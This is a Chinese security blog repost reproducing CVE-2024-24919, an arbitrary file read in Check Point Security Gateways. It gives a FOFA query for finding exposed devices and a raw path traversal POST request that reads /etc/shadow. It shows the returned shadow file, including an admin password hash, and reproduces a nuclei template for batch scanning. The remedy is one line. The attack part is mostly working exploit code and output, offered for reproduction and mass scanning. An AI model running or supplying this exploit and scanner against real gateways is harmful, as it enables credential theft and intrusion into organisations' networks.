CVE-2024-24919漏洞复现 Poc

admin
admin
admin
137989
文章
113
评论
2024年7月4日12:57:09评论198 views字数 2462阅读8分12秒阅读模式

 

 

01

漏洞名称

CheckPoint Gateway 任意文件读取漏洞 

 

 

02

漏洞影响

 

Check Point Security Gateways R77.X

Check Point Security Gateways R80.X

Check Point Security Gateways R81.X

 

 

 

03

漏洞描述

CheckPoint Gateway 是 CheckPoint 的一个安全网关设备。2024年5月,官方披露CVE-2024-24919 CheckPoint Gateway 文件读取漏洞,攻击者可构造恶意请求遍历读取系统上的文件,造成敏感信息泄漏。

04

FOFA搜索语句
 
app="Check_Point-SSL-Network-Extender"

CVE-2024-24919漏洞复现 Poc

05

漏洞复现

向靶场发送如下数据包

POST /clients/MyCRL HTTP/1.1Host: <redacted>Content-Length: 39
aCSHELL/../../../../../../../etc/shadow

响应内容如下

HTTP/1.0 200 OKDate: Thu, 30 May 2024 01:38:29 GMTServer: Check Point SVN foundationContent-Type: text/htmlX-UA-Compatible: IE=EmulateIE7Connection: closeX-Frame-Options: SAMEORIGINStrict-Transport-Security: max-age=31536000; includeSubDomainsContent-Length: 505
admin:$6$rounds=10000$N2We3dls$xVq34E9omWI6CJfTXf.4tO51T8Y1zy2K9MzJ9zv.jOjD9wNxG7TBlQ65j992Ovs.jDo1V9zmPzbct5PiR5aJm0:19872:0:99999:8:::monitor:*:19872:0:99999:8:::root:*:19872:0:99999:7:::nobody:*:19872:0:99999:7:::postfix:*:19872:0:99999:7:::rpm:!!:19872:0:99999:7:::shutdown:*:19872:0:99999:7:::pcap:!!:19872:0:99999:7:::halt:*:19872:0:99999:7:::cp_postgres:*:19872:0:99999:7:::cpep_user:*:19872:0:99999:7:::vcsa:!!:19872:0:99999:7:::_nonlocl:*:19872:0:99999:7:::sshd:*:19872:0:99999:7:::

漏洞复现成功

 

更多漏洞详细信息请参考

https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/
https://support.checkpoint.com/results/sk/sk182336

06

批量扫描 poc

nuclei 官方已发布poc,文件内容如下

id: CVE-2024-24919
info:  name: Check Point Quantum Gateway - Information Disclosure  author: johnk3r  severity: high  description: |    CVE-2024-24919 is an information disclosure vulnerability that can allow an attacker to access certain information on internet-connected Gateways which have been configured with IPSec VPN, remote access VPN or mobile access software blade.  reference:    - https://labs.watchtowr.com/check-point-wrong-check-point-cve-2024-24919/    - https://support.checkpoint.com/results/sk/sk182337  metadata:    max-request: 1    vendor: checkpoint    product: quantum_security_gateway    cpe: cpe:2.3:h:checkpoint:quantum_security_gateway:*:*:*:*:*:*:*:*    shodan-query: html:"Check Point SSL Network"    verified: true  tags: cve,cve2024,checkpoint,lfi
http:  - raw:      - |        POST /clients/MyCRL HTTP/1.1        Host: {{Hostname}}
        aCSHELL/../../../../../../../etc/shadow
    matchers-condition: and    matchers:      - type: regex        part: body        regex:          - "root:"          - "nobody:"        condition: and
      - type: status        status:          - 200# digest: 4a0a0047304502204c9518dd059877a34844f2e2842d83fd41e2ad0697ab8806694bb9de593e5d4902210097a7f34cde999f290f86e0ea7544cfc1279e367211e05a8f2944fd8c46d352f6:922c64590222798bb761d5b6d8e72950

07

修复建议

升级到最新版本。

原文始发于微信公众号(AI与网安):CVE-2024-24919漏洞复现

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月4日12:57:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   CVE-2024-24919漏洞复现 Pochttps://cn-sec.com/archives/2803443.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息